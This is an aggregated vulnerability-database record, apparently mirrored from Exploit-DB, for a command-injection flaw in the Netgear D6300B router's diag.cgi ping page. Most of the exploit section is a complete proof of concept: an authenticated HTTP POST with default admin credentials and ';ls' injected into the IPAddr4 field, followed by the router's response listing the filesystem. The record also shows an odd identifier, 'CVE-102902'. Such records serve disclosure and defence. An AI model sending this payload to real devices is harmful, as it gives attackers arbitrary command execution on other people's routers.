ID

VAR-E-201402-0144


EDB ID

39089


TITLE

Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 39089

DESCRIPTION

Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution. CVE-102902 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 39089

AFFECTED PRODUCTS

vendor:netgearmodel:d6300bscope: - version: -

Trust: 1.0

sources: EXPLOIT-DB: 39089

EXPLOIT

source: https://www.securityfocus.com/bid/65444/info

The Netgear D6300B router is prone to the following security vulnerabilities:

1. Multiple unauthorized-access vulnerabilities
2. A command-injection vulnerability
3. An information disclosure vulnerability

An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible.

Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected.

######## REQUEST: #########
###########################
POST /diag.cgi?id=991220771 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/DIAG_diag.htm
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1

######## RESPONSE: ########
###########################
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"
Cache-Control:no-cache
Pragma:no-cache

<!DOCTYPE HTML>
<html>
[...]
<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
bin
cferam.001
data
dev
etc
include
lib
linuxrc
mnt
opt

&lt;/textarea&gt;
[...]

Trust: 1.0

sources: EXPLOIT-DB: 39089

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 39089

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 39089

TYPE

'/diag.cgi?IPAddr4' Remote Command Execution

Trust: 1.0

sources: EXPLOIT-DB: 39089

CREDITS

Marcel Mangold

Trust: 0.6

sources: EXPLOIT-DB: 39089

EXTERNAL IDS

db:EXPLOIT-DBid:39089

Trust: 1.9

db:BIDid:65444

Trust: 1.9

db:EDBNETid:60088

Trust: 0.6

sources: BID: 65444 // EXPLOIT-DB: 39089 // EDBNET: 60088

REFERENCES

url:https://www.securityfocus.com/bid/65444/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/39089/

Trust: 0.6

url:https://www.exploit-db.com/exploits/39089

Trust: 0.3

sources: BID: 65444 // EXPLOIT-DB: 39089 // EDBNET: 60088

SOURCES

db:BIDid:65444
db:EXPLOIT-DBid:39089
db:EDBNETid:60088

LAST UPDATE DATE

2022-07-27T09:27:28.627000+00:00


SOURCES UPDATE DATE

db:BIDid:65444date:2014-07-14T00:17:00

SOURCES RELEASE DATE

db:BIDid:65444date:2014-02-05T00:00:00
db:EXPLOIT-DBid:39089date:2014-02-05T00:00:00
db:EDBNETid:60088date:2014-02-05T00:00:00